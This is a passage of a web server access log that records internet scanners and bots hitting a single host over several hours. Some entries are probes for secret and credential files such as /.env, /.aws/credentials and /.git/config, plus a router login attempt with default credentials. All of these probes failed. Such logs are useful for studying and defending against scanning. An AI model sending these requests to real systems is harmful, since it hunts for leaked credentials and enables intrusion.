- GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:03:40:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:03:41:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 71.6.232.29] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:06:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:04:09:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.131.39.179] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[16/Feb/2026:04:10:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:04:31:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:04:31:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 206.168.34.63] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[16/Feb/2026:04:31:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.63] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:04:31:10 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[16/Feb/2026:04:31:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.63] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:04:31:24 +0000] 404 - GET http 222.117.41.51 "/.well-known/security.txt" [Client 206.168.34.63] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[16/Feb/2026:04:31:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.63] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:04:31:58 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=user&psd=user" [Client 105.155.199.178] [Length 150] [Gzip -] "-" "-" -[16/Feb/2026:04:34:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:04:37:43 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; Coolpad 3622A Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36" "-" -[16/Feb/2026:04:40:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 3.91.58.30] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:43:58 +0000] 404 - GET http 222.117.41.51 "/developmentserver/metadatauploader" [Client 135.237.126.148] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[16/Feb/2026:04:55:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:05:04:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:05:04:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[16/Feb/2026:05:10:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:05:17:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[16/Feb/2026:05:20:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:05:24:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:05:27:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.20.68] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:05:32:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:05:36:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:05:46:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:05:49:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.166.255.102] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[16/Feb/2026:06:04:55 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:06:10:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:06:24:17 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:06:24:36 +0000] 400 - GET http 222.117.41.51 "/" [Client 18.218.118.203] [Length 654] [Gzip -] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[16/Feb/2026:06:27:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:06:30:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 64.62.156.122] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0" "-" -[16/Feb/2026:06:31:39 +0000] 404 - GET http 222.117.41.51 "/webui/" [Client 64.62.156.122] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 YaBrowser/25.8.0.0 Safari/537.36" "-" -[16/Feb/2026:06:32:44 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 0] [Gzip -] "-" "-" -[16/Feb/2026:06:33:14 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[16/Feb/2026:06:33:47 +0000] 404 - GET http 222.117.41.51 "/geoserver/web/" [Client 64.62.156.122] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0" "-" -[16/Feb/2026:06:38:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:06:53:17 +0000] 400 - GET http 222.117.41.51 "/" [Client 66.132.153.141] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[16/Feb/2026:06:53:21 +0000] 400 - - http localhost "-" [Client 66.132.153.141] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:06:53:39 +0000] 400 - GET http 222.117.41.51 "/security.txt" [Client 66.132.153.141] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[16/Feb/2026:06:54:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:06:59:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:07:02:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:07:17:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:07:25:17 +0000] 400 - - http localhost "-" [Client 3.132.26.232] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:07:25:17 +0000] 400 - GET http 222.117.41.51 "/" [Client 3.132.26.232] [Length 654] [Gzip -] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[16/Feb/2026:07:25:25 +0000] 400 - GET http 222.117.41.51 "/" [Client 3.132.26.232] [Length 654] [Gzip -] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[16/Feb/2026:07:29:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:07:36:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.135.193.11] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:36:29 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:36:29 +0000] 404 - GET http 222.117.41.51 "/.env.local" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:36:29 +0000] 404 - GET http 222.117.41.51 "/.env.staging" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:36:30 +0000] 404 - GET http 222.117.41.51 "/.env.production" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:36:30 +0000] 404 - GET http 222.117.41.51 "/.env.development" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:36:30 +0000] 404 - GET http 222.117.41.51 "/.aws/credentials" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:36:31 +0000] 404 - GET http 222.117.41.51 "/app/.env" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:36:31 +0000] 404 - GET http 222.117.41.51 "/config.json" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:07:44:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 162.216.150.167] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[16/Feb/2026:07:46:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 176.65.148.74] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:07:53:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:07:54:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:07:54:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.60] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:07:54:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.60] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:08:12:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:08:15:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:08:19:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:08:34:26 +0000] 404 - POST http 222.117.41.51 "/HNAP1/" [Client 182.121.171.223] [Length 150] [Gzip -] "-" "-" -[16/Feb/2026:08:37:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 91.224.92.99] [Length 0] [Gzip -] "-" "-" -[16/Feb/2026:08:43:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:08:52:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:09:08:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:09:10:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:09:33:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:09:40:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:09:44:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:09:52:08 +0000] 404 - GET http 222.117.41.51 "/druid/index.html" [Client 20.65.195.53] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[16/Feb/2026:09:55:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.94.124.147] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:09:55:14 +0000] 405 - OPTIONS http 222.117.41.51 "/" [Client 34.94.124.147] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:09:59:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:10:02:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:10:24:05 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:10:41:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:10:50:00 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:10:57:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:11:01:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.153.10.83] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[16/Feb/2026:11:02:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:11:08:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 91.230.168.214] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:11:08:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 91.230.168.214] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" -[16/Feb/2026:11:10:09 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[16/Feb/2026:11:13:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:11:20:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 18.116.101.220] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[16/Feb/2026:11:20:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 18.116.101.220] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:11:20:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 18.116.101.220] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:11:21:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 18.116.101.220] [Length 568] [Gzip 1.86] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[16/Feb/2026:11:24:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 18.116.101.220] [Length 0] [Gzip -] "-" "-" -[16/Feb/2026:11:35:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:11:40:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:11:43:31 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[16/Feb/2026:11:43:32 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[16/Feb/2026:11:43:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:11:43:33 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[16/Feb/2026:11:43:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[16/Feb/2026:11:57:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:12:02:39 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 104.192.2.62] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15" "-" -[16/Feb/2026:12:04:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:12:06:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:12:25:41 +0000] 400 - GET http localhost "/" [Client 80.82.70.133] [Length 654] [Gzip -] "Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42" "-" -[16/Feb/2026:12:28:53 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:12:29:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:12:31:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.157.150.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[16/Feb/2026:12:45:56 +0000] 400 - GET http 222.117.41.51 "/.git/config" [Client 104.192.2.62] [Length 654] [Gzip -] "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:53:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 130.12.180.151] [Length 1033] [Gzip -] "Hello World/1.0" "-" -[16/Feb/2026:12:53:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:12:55:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[16/Feb/2026:12:59:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[16/Feb/2026:13:19:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 